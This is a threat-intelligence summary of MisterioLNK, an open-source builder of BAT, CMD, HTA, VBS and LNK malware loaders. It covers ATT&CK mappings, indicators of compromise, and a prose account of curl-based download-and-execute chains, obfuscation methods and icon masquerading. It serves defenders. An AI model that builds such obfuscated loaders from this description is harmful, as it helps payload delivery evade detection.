Keypoints
- MisterioLNK is a .NET-based open-source loader builder available on GitHub that accepts a URL and generates loader files (BAT, CMD, HTA, VBS, LNK) to fetch and run a second-stage payload.
- The builder includes an obfuscator module for BAT, CMD, and VBS that conceals script content (random %…% insertion for batch and Chr() concatenation for VBS) and can set custom icons for LNK files.
- BAT/CMD loaders use curl to download payloads to temporary directories and then execute them (example: download to %TEMP% and start the executable), enhancing stealth and persistence of execution.
- HTA loaders rely on JavaScript and ActiveX objects to perform downloads and execution; HTA obfuscation support is planned but currently inactive.
- LNK loaders create shortcut targets that invoke cmd.exe to run download-and-execute commands and can masquerade with altered icons to increase user interaction.
- Generated samples showed low detection rates across vendors for several formats (notably BAT, CMD, HTA, and some VBS variants), underscoring the effectiveness of the obfuscation techniques.
- Recommendations include detection of obfuscation patterns, behavioral monitoring of scripting engines and curl-based downloads, application whitelisting, and user education about deceptive shortcut files.
MITRE Techniques
- [T1204.002] User Execution: Malicious File – Loader files (BAT, CMD, HTA, VBS, LNK) rely on user interaction to run the payload (‘MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload.’)
- [T1059] Command and Scripting Interpreter – Uses scripting languages to execute commands on the target system (‘Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system.’)
- [T1059.005] Command and Scripting Interpreter: Visual Basic – Deploys obfuscated VBScript that reconstructs and executes payload-fetching commands (‘Deploys obfuscated VBScript files that execute commands to download and run additional payloads.’)
- [T1059.003] Command and Scripting Interpreter: Command Interpreter – Relies on cmd.exe to issue curl-based download and execution commands (‘Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution.’)
- [T1036.008] Masquerading: Masquerade File Type – Uses LNK files with custom icons to disguise loaders as legitimate files (‘Uses LNK files with altered icons to disguise the loader as a legitimate file.’)
- [T1027.010] Obfuscated Files or Information: Command Obfuscation – Employs multiple obfuscation methods (random %…% insertion, Chr() concatenation) to hide script content (‘MisterioLNK employs obfuscation techniques to hide the content of its scripts.’)
- [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTP/S via curl to communicate with remote servers and download payloads (‘Uses HTTP/S through the curl command to communicate with remote servers to download payloads.’)
Indicators of Compromise
- [SHA256] Payload hashes observed in analysis – 3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17, dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850, and 5 more hashes
- [URL/Domain] Hosting and repo examples – https://github.com/K3rnel-Dev/MisterioLNK/tree/main (project repo), hxxps://live.sysinternals.com/du.exe (example download host used in LNK target)
- [File name] Downloaded/executed artifacts – du.exe, %temp%ntvy4adp.exe (example target filename created via curl and started with start /b)
- [File types] Generated loader file examples – .lnk (shortcut loader), .vbs (VBScript loader), .bat/.cmd (batch/command loaders)
MisterioLNK is a .NET tool composed of two modules: a builder that takes a URL to a hosted second-stage payload and generates loader files (BAT, CMD, HTA, VBS, LNK), and an obfuscator that transforms BAT, CMD, and VBS payloads to evade static detections. The builder can add custom icons to LNK files and saves downloaded payloads into temporary directories before launching them; example LNK target commands use cmd.exe to run curl against a remote URL (shown as hxxps://live.sysinternals.com/du.exe) to write an executable to %TEMP% and start it.
For BAT/CMD loaders, the generated scripts call curl to fetch the payload and then execute it; when obfuscation is enabled, the batch obfuscator inserts random strings wrapped in percent signs between characters and prepends a comment line indicating MisterioLNK processing, preserving runtime behavior while confusing static analysis. HTA loaders embed JavaScript and ActiveX calls to perform the same download-and-execute flow (HTA obfuscation is not yet active). VBS obfuscation converts each character to its ASCII code and concatenates Chr() calls, wrapping the result in an Execute() call so the original script is reconstructed and run at execution time.
The practical execution chain typically involves a user-triggered loader (user execution), invocation of cmd.exe or the script host to run the obfuscated script, curl-based HTTP/S retrieval of the payload, placement in a temporary folder, and process start. These steps—combined with custom LNK icons and multiple obfuscation approaches—explain the low detection rates observed for many generated samples and highlight why detection strategies should focus on behavioral indicators (scripting engine activity, unexpected curl usage, and writes/executions from %TEMP%).
Read more: https://cyble.com/blog/misteriolnk-the-open-source-builder-behind-malicious-loaders/